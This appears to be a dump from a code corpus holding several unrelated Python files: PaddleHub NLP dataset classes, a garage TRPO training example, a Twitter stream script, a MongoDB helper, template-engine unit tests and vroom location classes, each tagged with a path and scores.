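    from selenium.webdriver.common.by import By
    from selenium.webdriver.support.ui import WebDriverWait
    from selenium.webdriver.support import expected_conditions as EC
    # Blocks until at least one '(more)' link is present, else raises TimeoutException.
    return WebDriverWait(driver, timeout).until(
        EC.presence_of_all_elements_located((By.LINK_TEXT, '(more)'))
    )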
|
backup_bookmarks.py
|
| 0.162812 | 0.075414 |
from typing import Dict, List, Optional, Union, Tuple
import csv
import io
import os
import numpy as np
import paddle
from paddlehub.env import DATA_HOME
from paddlehub.text.bert_tokenizer import BertTokenizer
from paddlehub.text.tokenizer import CustomTokenizer
from paddlehub.utils.log import logger
from paddlehub.utils.utils import download
from paddlehub.utils.xarfile import is_xarfile, unarchive
class InputExample(object):
"""
The input data structure of Transformer modules (BERT, ERNIE and so on).
"""
def __init__(self, guid: int, text_a: str, text_b: Optional[str] = None, label: Optional[str] = None):
"""
The input data structure.
Args:
guid (:obj:`int`):
Unique id for the input data.
text_a (:obj:`str`, `optional`, defaults to :obj:`None`):
The first sequence. For single sequence tasks, only this sequence must be specified.
text_b (:obj:`str`, `optional`, defaults to :obj:`None`):
The second sequence if sentence-pair.
label (:obj:`str`, `optional`, defaults to :obj:`None`):
The label of the example.
Examples:
.. code-block:: python
from paddlehub.datasets.base_nlp_dataset import InputExample
example = InputExample(guid=0,
text_a='15.4寸笔记本的键盘确实爽,基本跟台式机差不多了',
text_b='蛮喜欢数字小键盘,输数字特方便,样子也很美观,做工也相当不错',
label='1')
"""
self.guid = guid
self.text_a = text_a
self.text_b = text_b
self.label = label
def __str__(self):
if self.text_b is None:
return "text={}\tlabel={}".format(self.text_a, self.label)
else:
return "text_a={}\ttext_b={},label={}".format(self.text_a, self.text_b, self.label)
class BaseNLPDataset(object):
"""
    The virtual base class for NLP datasets, such as TextClassificationDataset, SeqLabelingDataset, and so on.
    The base class must be subclassed and the method _read_file re-implemented.
"""
def __init__(self,
base_path: str,
tokenizer: Union[BertTokenizer, CustomTokenizer],
max_seq_len: Optional[int] = 128,
mode: Optional[str] = "train",
data_file: Optional[str] = None,
label_file: Optional[str] = None,
label_list: Optional[List[str]] = None):
"""
        Args:
base_path (:obj:`str`): The directory to the whole dataset.
tokenizer (:obj:`BertTokenizer` or :obj:`CustomTokenizer`):
It tokenizes the text and encodes the data as model needed.
            max_seq_len (:obj:`int`, `optional`, defaults to :obj:`128`):
If set to a number, will limit the total sequence returned so that it has a maximum length.
mode (:obj:`str`, `optional`, defaults to `train`):
It identifies the dataset mode (train, test or dev).
data_file(:obj:`str`, `optional`, defaults to :obj:`None`):
The data file name, which is relative to the base_path.
label_file(:obj:`str`, `optional`, defaults to :obj:`None`):
The label file name, which is relative to the base_path.
It is all labels of the dataset, one line one label.
label_list(:obj:`List[str]`, `optional`, defaults to :obj:`None`):
The list of all labels of the dataset
"""
self.data_file = os.path.join(base_path, data_file)
self.label_list = label_list
self.mode = mode
self.tokenizer = tokenizer
self.max_seq_len = max_seq_len
if label_file:
self.label_file = os.path.join(base_path, label_file)
if not self.label_list:
self.label_list = self._load_label_data()
else:
logger.warning("As label_list has been assigned, label_file is noneffective")
if self.label_list:
self.label_map = {item: index for index, item in enumerate(self.label_list)}
def _load_label_data(self):
"""
Loads labels from label file.
"""
if os.path.exists(self.label_file):
with open(self.label_file, "r", encoding="utf8") as f:
return f.read().strip().split("\n")
else:
raise RuntimeError("The file {} is not found.".format(self.label_file))
def _download_and_uncompress_dataset(self, destination: str, url: str):
"""
Downloads dataset and uncompresses it.
Args:
destination (:obj:`str`): The dataset cached directory.
url (:obj: str): The link to be downloaded a dataset.
"""
if not os.path.exists(destination):
dataset_package = download(url=url, path=DATA_HOME)
if is_xarfile(dataset_package):
unarchive(dataset_package, DATA_HOME)
else:
logger.info("Dataset {} already cached.".format(destination))
def _read_file(self, input_file: str, is_file_with_header: bool = False):
"""
Reads the files.
Args:
input_file (:obj:str) : The file to be read.
is_file_with_header(:obj:bool, `optional`, default to :obj: False) :
Whether or not the file is with the header introduction.
"""
raise NotImplementedError
def get_labels(self):
"""
Gets all labels.
"""
return self.label_list
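# --- Editor's illustrative sketch (not part of PaddleHub) ---------------------
# The class docstring above says _read_file must be re-implemented by subclasses.
# A minimal sketch of such an override for a "label<TAB>text" file; the class
# name and the assumed file layout are for illustration only.
class _ExampleTSVDataset(BaseNLPDataset):
    def _read_file(self, input_file: str, is_file_with_header: bool = False):
        examples = []
        with io.open(input_file, "r", encoding="UTF-8") as f:
            reader = csv.reader(f, delimiter="\t", quotechar=None)
            if is_file_with_header:
                next(reader)
            for seq_id, line in enumerate(reader):
                examples.append(InputExample(guid=seq_id, label=line[0], text_a=line[1]))
        return examples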
class TextClassificationDataset(BaseNLPDataset, paddle.io.Dataset):
"""
    The dataset class suitable for all text classification datasets.
"""
def __init__(self,
base_path: str,
tokenizer: Union[BertTokenizer, CustomTokenizer],
max_seq_len: int = 128,
mode: str = "train",
data_file: str = None,
label_file: str = None,
label_list: list = None,
is_file_with_header: bool = False):
"""
        Args:
base_path (:obj:`str`): The directory to the whole dataset.
tokenizer (:obj:`BertTokenizer` or :obj:`CustomTokenizer`):
It tokenizes the text and encodes the data as model needed.
            max_seq_len (:obj:`int`, `optional`, defaults to :obj:`128`):
If set to a number, will limit the total sequence returned so that it has a maximum length.
mode (:obj:`str`, `optional`, defaults to `train`):
It identifies the dataset mode (train, test or dev).
data_file(:obj:`str`, `optional`, defaults to :obj:`None`):
The data file name, which is relative to the base_path.
label_file(:obj:`str`, `optional`, defaults to :obj:`None`):
The label file name, which is relative to the base_path.
It is all labels of the dataset, one line one label.
label_list(:obj:`List[str]`, `optional`, defaults to :obj:`None`):
The list of all labels of the dataset
is_file_with_header(:obj:bool, `optional`, default to :obj: False) :
Whether or not the file is with the header introduction.
"""
super(TextClassificationDataset, self).__init__(
base_path=base_path,
tokenizer=tokenizer,
max_seq_len=max_seq_len,
mode=mode,
data_file=data_file,
label_file=label_file,
label_list=label_list)
self.examples = self._read_file(self.data_file, is_file_with_header)
self.records = self._convert_examples_to_records(self.examples)
def _read_file(self, input_file, is_file_with_header: bool = False) -> List[InputExample]:
"""
Reads a tab separated value file.
Args:
input_file (:obj:str) : The file to be read.
is_file_with_header(:obj:bool, `optional`, default to :obj: False) :
Whether or not the file is with the header introduction.
Returns:
examples (:obj:`List[InputExample]`): All the input data.
"""
if not os.path.exists(input_file):
raise RuntimeError("The file {} is not found.".format(input_file))
else:
with io.open(input_file, "r", encoding="UTF-8") as f:
reader = csv.reader(f, delimiter="\t", quotechar=None)
examples = []
seq_id = 0
header = next(reader) if is_file_with_header else None
for line in reader:
example = InputExample(guid=seq_id, label=line[0], text_a=line[1])
seq_id += 1
examples.append(example)
return examples
def _convert_examples_to_records(self, examples: List[InputExample]) -> List[dict]:
"""
Converts all examples to records which the model needs.
Args:
examples(obj:`List[InputExample]`): All data examples returned by _read_file.
Returns:
records(:obj:`List[dict]`): All records which the model needs.
"""
records = []
for example in examples:
record = self.tokenizer.encode(text=example.text_a, text_pair=example.text_b, max_seq_len=self.max_seq_len)
            # CustomTokenizer will tokenize the text first and then look up each word in the vocab.
            # If none of the words are found in the vocab, the text is dropped.
if not record:
logger.info(
"The text %s has been dropped as it has no words in the vocab after tokenization." % example.text_a)
continue
if example.label:
record['label'] = self.label_map[example.label]
records.append(record)
return records
def __getitem__(self, idx):
record = self.records[idx]
if 'label' in record.keys():
return np.array(record['input_ids']), np.array(record['segment_ids']), np.array(record['label'], dtype=np.int64)
else:
return np.array(record['input_ids']), np.array(record['segment_ids'])
def __len__(self):
return len(self.records)
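# --- Editor's note (sketch of the expected data layout) -----------------------
# _read_file above reads tab-separated rows as "label<TAB>text", so a train.tsv
# would look like (values are made up):
#     1	good keyboard, very comfortable to type on
#     0	the screen flickers after one week
# With such a file, a hedged construction (tokenizer creation omitted, since it
# depends on the chosen pretrained module) could look like:
#     ds = TextClassificationDataset(base_path='/path/to/dataset',
#                                    tokenizer=tokenizer,
#                                    data_file='train.tsv',
#                                    label_list=['0', '1'])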
class SeqLabelingDataset(BaseNLPDataset, paddle.io.Dataset):
def __init__(self,
base_path: str,
tokenizer: Union[BertTokenizer, CustomTokenizer],
max_seq_len: int = 128,
mode: str = "train",
data_file: str = None,
label_file: str = None,
label_list: list = None,
split_char: str ="\002",
no_entity_label: str = "O",
ignore_label: int = -100,
is_file_with_header: bool = False):
super(SeqLabelingDataset, self).__init__(
base_path=base_path,
tokenizer=tokenizer,
max_seq_len=max_seq_len,
mode=mode,
data_file=data_file,
label_file=label_file,
label_list=label_list)
self.no_entity_label = no_entity_label
self.split_char = split_char
self.ignore_label = ignore_label
self.examples = self._read_file(self.data_file, is_file_with_header)
self.records = self._convert_examples_to_records(self.examples)
def _read_file(self, input_file, is_file_with_header: bool = False) -> List[InputExample]:
"""Reads a tab separated value file."""
if not os.path.exists(input_file):
raise RuntimeError("The file {} is not found.".format(input_file))
else:
with io.open(input_file, "r", encoding="UTF-8") as f:
reader = csv.reader(f, delimiter="\t", quotechar=None)
examples = []
seq_id = 0
header = next(reader) if is_file_with_header else None
for line in reader:
example = InputExample(guid=seq_id, label=line[1], text_a=line[0])
seq_id += 1
examples.append(example)
return examples
def _convert_examples_to_records(self, examples: List[InputExample]) -> List[dict]:
"""
        Returns a list[dict] containing all the input information the model needs.
Args:
examples (list): the data examples, returned by _read_file.
Returns:
            a list with all the example records.
"""
records = []
for example in examples:
tokens, labels = self._reseg_token_label(
tokens=example.text_a.split(self.split_char),
labels=example.label.split(self.split_char))
record = self.tokenizer.encode(
text=tokens, max_seq_len=self.max_seq_len)
            # CustomTokenizer will tokenize the text first and then look up each word in the vocab.
            # If none of the words are found in the vocab, the text is dropped.
if not record:
logger.info(
"The text %s has been dropped as it has no words in the vocab after tokenization."
% example.text_a)
continue
if labels:
record["label"] = []
                tokens_with_special_token = self.tokenizer.convert_ids_to_tokens(record['input_ids'])
tokens_index = 0
                for token in tokens_with_special_token:
if tokens_index < len(
tokens) and token == tokens[tokens_index]:
record["label"].append(
self.label_list.index(labels[tokens_index]))
tokens_index += 1
elif token in [self.tokenizer.pad_token]:
record["label"].append(self.ignore_label) # label of special token
else:
record["label"].append(
self.label_list.index(self.no_entity_label))
records.append(record)
return records
    def _reseg_token_label(
            self, tokens: List[str], labels: Optional[List[str]] = None) -> Tuple[List[str], Optional[List[str]]]:
if labels:
if len(tokens) != len(labels):
raise ValueError(
"The length of tokens must be same with labels")
ret_tokens = []
ret_labels = []
for token, label in zip(tokens, labels):
sub_token = self.tokenizer(token)
if len(sub_token) == 0:
continue
ret_tokens.extend(sub_token)
ret_labels.append(label)
if len(sub_token) < 2:
continue
sub_label = label
if label.startswith("B-"):
sub_label = "I-" + label[2:]
ret_labels.extend([sub_label] * (len(sub_token) - 1))
if len(ret_tokens) != len(ret_labels):
raise ValueError(
"The length of ret_tokens can't match with labels")
return ret_tokens, ret_labels
else:
ret_tokens = []
for token in tokens:
sub_token = self.tokenizer(token)
if len(sub_token) == 0:
continue
ret_tokens.extend(sub_token)
if len(sub_token) < 2:
continue
return ret_tokens, None
def __getitem__(self, idx):
record = self.records[idx]
if 'label' in record.keys():
return np.array(record['input_ids']), np.array(record['segment_ids']), np.array(record['seq_len']), np.array(record['label'], dtype=np.int64)
else:
return np.array(record['input_ids']), np.array(record['segment_ids']), np.array(record['seq_len'])
def __len__(self):
return len(self.records)
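# --- Editor's illustrative sketch (not part of PaddleHub) ---------------------
# _reseg_token_label above propagates BIO labels onto subword pieces: the first
# piece keeps the original label and every further piece of the same word gets
# the matching "I-" tag. A standalone rendition of that rule on pre-split input
# (function name and example values are assumptions for illustration):
def _example_bio_propagation(sub_tokens_per_word, labels):
    """E.g. ([["Wash", "##ington"], ["is"]], ["B-LOC", "O"])
    -> (["Wash", "##ington", "is"], ["B-LOC", "I-LOC", "O"])."""
    ret_tokens, ret_labels = [], []
    for pieces, label in zip(sub_tokens_per_word, labels):
        if not pieces:
            continue
        ret_tokens.extend(pieces)
        ret_labels.append(label)
        if len(pieces) > 1:
            cont = "I-" + label[2:] if label.startswith("B-") else label
            ret_labels.extend([cont] * (len(pieces) - 1))
    return ret_tokens, ret_labels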
|
paddlehub/datasets/base_nlp_dataset.py
|
| 0.895651 | 0.258782 |
"""This is an example to train a task with parallel sampling."""
import click
from garage import wrap_experiment
from garage.envs import GarageEnv
from garage.experiment import LocalTFRunner
from garage.experiment.deterministic import set_seed
from garage.np.baselines import LinearFeatureBaseline
from garage.tf.algos import TRPO
from garage.tf.policies import CategoricalMLPPolicy
from garage.tf.samplers import BatchSampler
@click.command()
@click.option('--batch_size', type=int, default=4000)
@click.option('--max_path_length', type=int, default=100)
@wrap_experiment
def trpo_cartpole_batch_sampler(ctxt=None,
seed=1,
batch_size=4000,
max_path_length=100):
"""Train TRPO with CartPole-v1 environment.
Args:
ctxt (garage.experiment.ExperimentContext): The experiment
configuration used by LocalRunner to create the snapshotter.
seed (int): Used to seed the random number generator to produce
determinism.
batch_size (int): Number of timesteps to use in each training step.
max_path_length (int): Number of timesteps to truncate paths to.
"""
set_seed(seed)
n_envs = batch_size // max_path_length
with LocalTFRunner(ctxt, max_cpus=n_envs) as runner:
env = GarageEnv(env_name='CartPole-v1')
policy = CategoricalMLPPolicy(name='policy',
env_spec=env.spec,
hidden_sizes=(32, 32))
baseline = LinearFeatureBaseline(env_spec=env.spec)
algo = TRPO(env_spec=env.spec,
policy=policy,
baseline=baseline,
max_path_length=max_path_length,
discount=0.99,
max_kl_step=0.01)
runner.setup(algo=algo,
env=env,
sampler_cls=BatchSampler,
sampler_args={'n_envs': n_envs})
        runner.train(n_epochs=100, batch_size=batch_size, plot=False)
trpo_cartpole_batch_sampler()
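# Editor's note: with the click options above, the defaults give
# n_envs = batch_size // max_path_length = 4000 // 100 = 40 sampler environments.
# A hedged example of overriding them from the command line would be:
#     python trpo_cartpole_batch_sampler.py --batch_size 8000 --max_path_length 200
# which still yields 8000 // 200 = 40 parallel environments.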
|
examples/tf/trpo_cartpole_batch_sampler.py
|
"""This is an example to train a task with parallel sampling."""
import click
from garage import wrap_experiment
from garage.envs import GarageEnv
from garage.experiment import LocalTFRunner
from garage.experiment.deterministic import set_seed
from garage.np.baselines import LinearFeatureBaseline
from garage.tf.algos import TRPO
from garage.tf.policies import CategoricalMLPPolicy
from garage.tf.samplers import BatchSampler
@click.command()
@click.option('--batch_size', type=int, default=4000)
@click.option('--max_path_length', type=int, default=100)
@wrap_experiment
def trpo_cartpole_batch_sampler(ctxt=None,
seed=1,
batch_size=4000,
max_path_length=100):
"""Train TRPO with CartPole-v1 environment.
Args:
ctxt (garage.experiment.ExperimentContext): The experiment
configuration used by LocalRunner to create the snapshotter.
seed (int): Used to seed the random number generator to produce
determinism.
batch_size (int): Number of timesteps to use in each training step.
max_path_length (int): Number of timesteps to truncate paths to.
"""
set_seed(seed)
n_envs = batch_size // max_path_length
with LocalTFRunner(ctxt, max_cpus=n_envs) as runner:
env = GarageEnv(env_name='CartPole-v1')
policy = CategoricalMLPPolicy(name='policy',
env_spec=env.spec,
hidden_sizes=(32, 32))
baseline = LinearFeatureBaseline(env_spec=env.spec)
algo = TRPO(env_spec=env.spec,
policy=policy,
baseline=baseline,
max_path_length=max_path_length,
discount=0.99,
max_kl_step=0.01)
runner.setup(algo=algo,
env=env,
sampler_cls=BatchSampler,
sampler_args={'n_envs': n_envs})
runner.train(n_epochs=100, batch_size=4000, plot=False)
trpo_cartpole_batch_sampler()
| 0.909846 | 0.424651 |
import json
import requests
import os
from dotenv import load_dotenv
# Load env
load_dotenv()
bearer_token = os.getenv("BEARER_TOKEN")
##chatid = os.getenv("CHATID")
def bearer_oauth(r):
r.headers["Authorization"] = f"Bearer {bearer_token}"
r.headers["User-Agent"] = "v2FilteredStreamPython"
return r
def get_rules():
response = requests.get(
"https://api.twitter.com/2/tweets/search/stream/rules", auth=bearer_oauth
)
if response.status_code != 200:
raise Exception(
"Cannot get rules (HTTP {}): {}".format(response.status_code, response.text)
)
print(json.dumps(response.json()))
return response.json()
def delete_all_rules(rules):
if rules is None or "data" not in rules:
return None
ids = list(map(lambda rule: rule["id"], rules["data"]))
payload = {"delete": {"ids": ids}}
response = requests.post(
"https://api.twitter.com/2/tweets/search/stream/rules",
auth=bearer_oauth,
json=payload
)
if response.status_code != 200:
raise Exception(
"Cannot delete rules (HTTP {}): {}".format(
response.status_code, response.text
)
)
print(json.dumps(response.json()))
def set_rules(delete):
sample_rules = [
{"value" : "from:y_o_m_y_o_m"},
]
payload = {"add": sample_rules}
response = requests.post(
"https://api.twitter.com/2/tweets/search/stream/rules",
auth = bearer_oauth,
json = payload,
)
if response.status_code != 201:
raise Exception(
"Cannot add rules : {} {}".format(response.status_code, response.text)
)
print(json.dumps(response.json()))
def get_stream(set):
tweet_fields = "tweet.fields=public_metrics,entities"
url = "https://api.twitter.com/2/tweets/search/stream?{}&expansions=author_id".format(tweet_fields)
response = requests.get(
url,auth=bearer_oauth, stream=True,
)
#print(response.status_code)
if response.status_code != 200:
raise Exception(
"Cannot add stream, : {} {}".format(response.status_code, response.text)
)
for response_line in response.iter_lines():
if response_line:
json_response = json.loads(response_line)
# print(json.dumps(json_response, indent=4, sort_keys=True))
if "RT " not in json_response["data"]["text"]:
print(json_response["data"]["text"])
fp = open("tweet", "w")
fp.write(json_response["data"]["text"])
fp.close()
os._exit(0)
def main():
rules = get_rules()
delete = delete_all_rules(rules)
set = set_rules(delete)
get_stream(set)
if __name__ == "__main__":
main()
|
doukichan.py
| 0.150715 | 0.078926 |
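get_stream above drops retweets by checking the raw tweet text before writing it to the tweet file. A standalone illustration of that filtering step, using a hypothetical byte string shaped like a v2 filtered-stream line:
import json
sample_line = b'{"data": {"id": "1", "text": "hello world"}}'  # hypothetical stream line
tweet = json.loads(sample_line)
if "RT " not in tweet["data"]["text"]:
    with open("tweet", "w") as fp:
        fp.write(tweet["data"]["text"])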
import requests
import pymongo
class DataBase:
def __init__(self):
self.client = None
self.db = None
self.col = None
self.connect_init()
def connect_init(self):
# 下面这个是哪个数据库来着???
# self.client = pymongo.MongoClient("mongodb+srv://LanceLiang:<EMAIL>."
# "mongodb.net/test?retryWrites=true&w=majority")
self.client = pymongo.MongoClient("mongodb+srv://lanceliang:1<EMAIL>0<EMAIL>."
"mongodb.net/test?retryWrites=true&w=majority")
# self.client = pymongo.MongoClient()
self.db = self.client.novel_publisher
self.col = self.db.novel_publisher
def db_init(self):
collection_names = self.db.list_collection_names()
if 'novel_publisher' in collection_names:
self.db.drop_collection('novel_publisher')
self.col = self.db.novel_publisher
# 只有在插入一个数据之后才会建立Collection
# print(dict(self.col.find({})))
# self.col.insert_one({'created': True})
def get_books(self):
data = list(self.col.distinct('bookname'))
return data
def get_chapters(self, bookname=None):
if bookname is None:
data = list(self.col.distinct('chaptername'))
else:
data = list(self.col.find({'bookname': bookname}, {'bookname': 1, 'chaptername': 1, '_id': 0}))
return data
def publish(self, bookname: str, chaptername: str, url: str):
data = list(self.col.find({'bookname': bookname, 'chaptername': chaptername}, {}))
if len(data) == 0:
self.col.insert_one({'bookname': bookname, 'chaptername': chaptername, 'url': url})
else:
self.col.update_one({'bookname': bookname, 'chaptername': chaptername},
{'$set': {'bookname': bookname, 'chaptername': chaptername, 'url': url}})
def get_content(self, bookname: str, chaptername: str):
data = list(self.col.find({'bookname': bookname, 'chaptername': chaptername},
{'bookname': 1, 'chaptername': 1, 'url': 1, '_id': 0}))
if len(data) == 0:
return None
return data[0]['url']
if __name__ == '__main__':
_db = DataBase()
_db.db_init()
_db.publish('TestBook', 'TestChapter', 'https://raw.githubusercontent.com/LanceLiang2018/MyNovels/master/novels/%E7%9F%AD%E7%AF%87/%E6%97%A7%E6%A2%A6/%E6%97%A7%E6%A2%A6.md')
print(_db.get_books())
print(_db.get_chapters('TestBook'))
print(_db.get_content('TestBook', 'TestChapter'))
|
database.py
| 0.110435 | 0.108969 |
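publish above emulates an upsert with a find followed by either insert_one or update_one. For comparison, pymongo can express the same insert-or-update in a single call with upsert=True; a sketch (the collection object is passed in rather than taken from the class):
def publish_upsert(col, bookname: str, chaptername: str, url: str):
    """Insert or update a chapter record in one round trip."""
    col.update_one(
        {'bookname': bookname, 'chaptername': chaptername},
        {'$set': {'bookname': bookname, 'chaptername': chaptername, 'url': url}},
        upsert=True,
    )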
import re
import pytest
from errors import TemplateSyntaxError
from template import Template
def tryRender(text, ctx=None, expected=None):
actual = Template(text).render(ctx or {})
if expected:
assert actual == expected
def assertSyntaxError(text, ctx=None, msg=None):
with pytest.raises(TemplateSyntaxError) as excinfo:
tryRender(text, ctx)
assert str(excinfo.value) == msg
def test_passthrough():
tryRender("Hello.", {}, "Hello.")
tryRender("Hello, 20% fun time!", {}, "Hello, 20% fun time!")
def test_variables():
tryRender("Hello, {{name}}!", {'name': '1_x7'}, "Hello, 1_x7!")
def test_undefined_variables():
with pytest.raises(KeyError):
tryRender("Hi, {{name}}!")
def test_pipes():
data = {
'name': 'Ned',
'upper': lambda x: x.upper(),
'second': lambda x: x[1],
}
tryRender("Hello, {{name|upper}}!", data, "Hello, NED!")
tryRender("Hello, {{name|upper|second}}!", data, "Hello, E!")
def test_reusability():
globs = {
'upper': lambda x: x.upper(),
'punct': '!',
}
template = Template("This is {{name|upper}}{{punct}}", globs)
assert template.render({'name': 'Ned'}) == "This is NED!"
assert template.render({'name': 'Ben'}) == "This is BEN!"
def test_attributes():
obj = AnyOldObject(a="Ay")
tryRender("{{obj.a}}", locals(), "Ay")
obj2 = AnyOldObject(obj=obj, b="Bee")
tryRender("{{obj2.obj.a}} {{obj2.b}}", locals(), "Ay Bee")
def test_member_function():
class WithMemberFns(AnyOldObject):
def ditto(self):
return self.txt + self.txt
obj = WithMemberFns(txt="Once")
tryRender("{{obj.ditto}}", locals(), "OnceOnce")
def test_dict():
d = {'a': 17, 'b': 23}
tryRender("{{d.a}} < {{d.b}}", locals(), "17 < 23")
def test_loops():
nums = [1, 2, 3, 4]
tryRender(
"Look: {% for n in nums %}{{n}}, {% endfor %}done.",
locals(),
"Look: 1, 2, 3, 4, done."
)
def test_loops_with_pipes():
nums = [1, 2, 3, 4]
def rev(l):
l = l[:]
l.reverse()
return l
tryRender(
"Look: {% for n in nums|rev %}{{n}}, {% endfor %}done.",
locals(),
"Look: 4, 3, 2, 1, done."
)
def test_empty_loops():
tryRender(
"Empty: {% for n in nums %}{{n}}, {% endfor %}done.",
{'nums': []},
"Empty: done."
)
def test_multiline_loops():
tryRender(
"Look: \n{% for n in nums %}\n{{n}}, \n{% endfor %}done.",
{'nums': [1, 2, 3]},
"Look: \n\n1, \n\n2, \n\n3, \ndone."
)
def test_multiple_loops():
tryRender(
"{% for n in nums %}{{n}}{% endfor %} and "
"{% for n in nums %}{{n}}{% endfor %}",
{'nums': [1, 2, 3]},
"123 and 123"
)
def test_comments():
tryRender(
"Hello, {# Name goes here: #}{{name}}!",
{'name': 'Ned'}, "Hello, Ned!"
)
tryRender(
"Hello, {# Name\ngoes\nhere: #}{{name}}!",
{'name': 'Ned'}, "Hello, Ned!"
)
def test_if():
tryRender(
"Hi, {% if ned %}NED{% endif %}{% if ben %}BEN{% endif %}!",
{'ned': 1, 'ben': 0},
"Hi, NED!"
)
tryRender(
"Hi, {% if ned %}NED{% endif %}{% if ben %}BEN{% endif %}!",
{'ned': 0, 'ben': 1},
"Hi, BEN!"
)
tryRender(
"Hi, {% if ned %}NED{% if ben %}BEN{% endif %}{% endif %}!",
{'ned': 0, 'ben': 0},
"Hi, !"
)
tryRender(
"Hi, {% if ned %}NED{% if ben %}BEN{% endif %}{% endif %}!",
{'ned': 1, 'ben': 0},
"Hi, NED!"
)
tryRender(
"Hi, {% if ned %}NED{% if ben %}BEN{% endif %}{% endif %}!",
{'ned': 1, 'ben': 1},
"Hi, NEDBEN!"
)
def test_complex_if():
class Complex(AnyOldObject):
"""A class to try out complex data access."""
def getit(self):
"""Return it."""
return self.it
obj = Complex(it={'x': "Hello", 'y': 0})
tryRender(
"@"
"{% if obj.getit.x %}X{% endif %}"
"{% if obj.getit.y %}Y{% endif %}"
"{% if obj.getit.y|str %}S{% endif %}"
"!",
{'obj': obj, 'str': str},
"@XS!"
)
def test_loop_if():
tryRender(
"@{% for n in nums %}{% if n %}Z{% endif %}{{n}}{% endfor %}!",
{'nums': [0, 1, 2]},
"@0Z1Z2!"
)
tryRender(
"X{%if nums%}@{% for n in nums %}{{n}}{% endfor %}{%endif%}!",
{'nums': [0, 1, 2]},
"X@012!"
)
tryRender(
"X{%if nums%}@{% for n in nums %}{{n}}{% endfor %}{%endif%}!",
{'nums': []},
"X!"
)
def test_nested_loops():
tryRender(
"@"
"{% for n in nums %}"
"{% for a in abc %}{{a}}{{n}}{% endfor %}"
"{% endfor %}"
"!",
{'nums': [0, 1, 2], 'abc': ['a', 'b', 'c']},
"@a0b0c0a1b1c1a2b2c2!"
)
def test_exception_during_evaluation():
with pytest.raises(TypeError):
tryRender("Hey {{foo.bar.baz}} there", {'foo': None}, "Hey ??? there")
def test_bad_names():
assertSyntaxError("Wat: {{ var%&!@ }}", {}, "The param's name is invalid.: 'var%&!@'")
assertSyntaxError("Wat: {{ foo|filter%&!@ }}", {}, "The param's name is invalid.: 'filter%&!@'")
assertSyntaxError("Wat: {% for @ in x %}{% endfor %}", {}, "The param's name is invalid.: '@'")
def test_bogus_tag_syntax():
assertSyntaxError("Huh: {% bogus %}!!{% endbogus %}??", {}, "Don't understand tag: 'bogus'")
def test_malformed_if():
assertSyntaxError("Buh? {% if %}hi!{% endif %}", {}, "Invalid If Statement: '{% if %}'")
assertSyntaxError("Buh? {% if this or that %}hi!{% endif %}", {}, "Invalid If Statement: '{% if this or that %}'")
def test_malformed_for():
assertSyntaxError("Weird: {% for %}loop{% endfor %}", {}, "Invalid For Statement: '{% for %}'")
assertSyntaxError("Weird: {% for x from y %}loop{% endfor %}", {}, "Invalid For Statement: '{% for x from y %}'")
assertSyntaxError("Weird: {% for x, y in z %}loop{% endfor %}", {}, "Invalid For Statement: '{% for x, y in z %}'")
def test_bad_nesting():
assertSyntaxError("{% if x %}X", {}, "Unmatched action tag: 'if'")
assertSyntaxError("{% if x %}X{% endfor %}", {}, "Mismatched end tag: 'for'")
assertSyntaxError("{% if x %}{% endif %}{% endif %}", {}, "Too many ends: '{% endif %}'")
def test_malformed_end():
assertSyntaxError("{% if x %}X{% end if %}", {}, "Invalid End Statement: '{% end if %}'")
assertSyntaxError("{% if x %}X{% endif now %}", {}, "Invalid End Statement: '{% endif now %}'")
class AnyOldObject:
def __init__(self, **attrs):
for k, v in attrs.items():
setattr(self, k, v)
|
template_test.py
| 0.397237 | 0.358437 |
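The error-message assertions above hinge on pytest.raises returning an ExceptionInfo object whose .value is the raised exception. A self-contained illustration of that pattern outside the template engine (divide is a throwaway example function):
import pytest
def divide(a, b):
    if b == 0:
        raise ValueError("b must be non-zero")
    return a / b
def test_divide_by_zero_message():
    with pytest.raises(ValueError) as excinfo:
        divide(1, 0)
    assert str(excinfo.value) == "b must be non-zero"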
from __future__ import annotations
from typing import Sequence, Tuple, Union
from . import _vroom
class LocationIndex(_vroom.Location):
"""Index in the custom duration matrix for where to find distances.
Attributes:
index:
Location index referring to column in the duration
matrix.
Args:
index:
Location index referring to column in the duration
matrix.
location:
Other location with `index` attribute to make a copy of.
Examples:
>>> loc = LocationIndex(4)
>>> loc
vroom.LocationIndex(4)
>>> loc.index
4
See also:
:cls:`vroom.Location`
"""
def __init__(
self,
index: Union[int, Location],
) -> None:
if isinstance(index, _vroom.Location):
if not index._user_index():
name = index.__class__.__name__
raise TypeError(f"Can not convert {name} to LocationIndex")
index = index._index()
assert isinstance(index, int)
_vroom.Location.__init__(self, index)
assert not self._has_coordinates()
@property
def index(self) -> int:
"""Location index."""
return self._index()
def __repr__(self) -> str:
return f"vroom.{self.__class__.__name__}({self.index})"
class LocationCoordinates(_vroom.Location):
"""Location longitude and latitude.
Attributes:
index:
Location index referring to column in the duration
matrix.
coords:
Longitude and latitude coordinate.
Args:
coords:
Longitude and latitude coordinate.
location:
Other location with `coords` attribute to make a copy of.
Examples:
>>> loc = LocationCoordinates([2., 3.])
>>> loc
vroom.LocationCoordinates((2.0, 3.0))
>>> loc.coords
(2.0, 3.0)
See also:
:cls:`vroom.Location`
"""
def __init__(
self,
coords: Union[Location, Sequence[float]],
) -> None:
if isinstance(coords, _vroom.Location):
if not coords._has_coordinates():
name = coords.__class__.__name__
raise TypeError(f"Can not convert {name} to LocationCoordinates")
coords = [coords._lon(), coords._lat()]
assert isinstance(coords, Sequence)
coords = [float(coord) for coord in coords]
assert len(coords) == 2
_vroom.Location.__init__(self, coords=coords)
assert self._has_coordinates()
assert not self._user_index()
@property
def coords(self) -> Tuple[float, float]:
"""Location longitude and latitude."""
return self._lon(), self._lat()
def __repr__(self):
return f"vroom.{self.__class__.__name__}({self.coords})"
class Location(LocationIndex, LocationCoordinates):
"""Location for where a job needs to e done.
Either as an index referring to a column in the durations matrix, or as
longitude-latitude coordinates.
Converts to :cls:`LocationCoordinates` if no `index` is provided, and to
    :cls:`LocationIndex` if no `coords` is provided.
Attributes:
index:
Location index referring to column in the duration
matrix.
coords:
Longitude and latitude coordinate.
Args:
index:
Location index referring to column in the duration
matrix.
coords:
Longitude and latitude coordinate.
location:
Other location to make a smart copy of.
Examples:
>>> loc = vroom.Location(index=4, coords=(7., 8.))
>>> loc
vroom.Location(index=4, coords=(7.0, 8.0))
>>> loc.index, loc.coords
(4, (7.0, 8.0))
>>> vroom.Location(4)
vroom.LocationIndex(4)
>>> vroom.Location((7., 8.))
vroom.LocationCoordinates((7.0, 8.0))
See also:
:cls:`vroom.LocationIndex`, :cls:`vroom.LocationCoordinates`
"""
